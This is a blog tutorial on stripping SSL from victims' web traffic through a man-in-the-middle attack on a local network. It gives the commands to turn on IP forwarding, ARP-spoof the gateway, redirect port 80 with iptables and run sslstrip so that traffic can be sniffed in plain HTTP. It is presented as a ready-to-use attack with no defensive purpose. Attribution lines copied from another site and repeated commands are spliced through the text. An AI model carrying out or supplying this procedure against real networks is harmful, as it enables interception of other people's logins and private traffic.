CIP Cyber

Crack SSL Using SSLStrip With BackTrack5

Table of Contents

Well this is the tutorial based article, so you must know about SSL (secure socket layer) and something about Backtrack5 because we are using backtrack5 for this tutorial, if you are using some old version like backtrack4 or if you are using some other Linux so you must be sure to install all the dependencies that being used in this tutorial.

 

Secure socket layer or SSL used to established a secure and encrypt connection between user and the server and we would like to break this secure connection so the sniffing will be occur successfully. Click here to learn more about SSL.
To crack SSL protection we launch man in the middle attack, so doing this we need some tools and the requirement list is
1. Linux OS 2. Arpspoof 3. IPTables 4. SSLStrip 5. NetStat

Read more at: http://vishnuvalentino.com/computer/break-ssl-protection-using-sslstrip-and-backtrack-5/
Copyright © Vishnu Valentin

Now start the game first of all, make your Linux box to start port forwarding use this command.
echo ‘1’ > /proc/sys/net/ipv4/ip_forward

Read more at: http://vishnuvalentino.com/computer/break-ssl-protection-using-sslstrip-and-backtrack-5/
Copyright © Vishnu Valentino

echo ‘1’ > /proc/sys/net/ipv4/ip_forward

After this your Linux box will able to forward all the packets, now you must know about your gateway IP, to know about your gateway use the command

netstat -nr 

Now use ARPSpoof to perform attack

arpspoof -i eth0 192.168.8.8 

Here eth0 represents the network interface card if you are using wireless link than it may be wlan0, while 192.168.8.8 is the default gateway in your case may be it different normally people are using 192.168.1.1 or 10.0.0.1
Its time to use SSL Strip, download and install SSL strip from the official website shared before, after installation we are using SSL strip, make your firewall to redirect all the traffic from port 80 to port 8080 so use the command

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

 After this make all the traffic to go from ARPspoof tables 
echo ‘1’ > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 192.168.8.8 

If your arpspoof start capturing traffic means everything is fine and the time is to use SSL strip use the command below

sslstrip -l 8080

After that your browser address bar does not use https it only use http and the sniffing is so easy.
Special Thanks to: 
Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
CIP Cyber Staff

CIP Cyber Staff

CIP Cyber Staff comprises CIP cybersecurity experts committed to delivering comprehensive information on critical infrastructure protection. The content covers diverse topics, equipping professionals to defend organizations and communities in an ever-evolving cyber landscape.

Most popular

Industrial Cybersecurity

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Related Articles

What Proxies Are For

When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings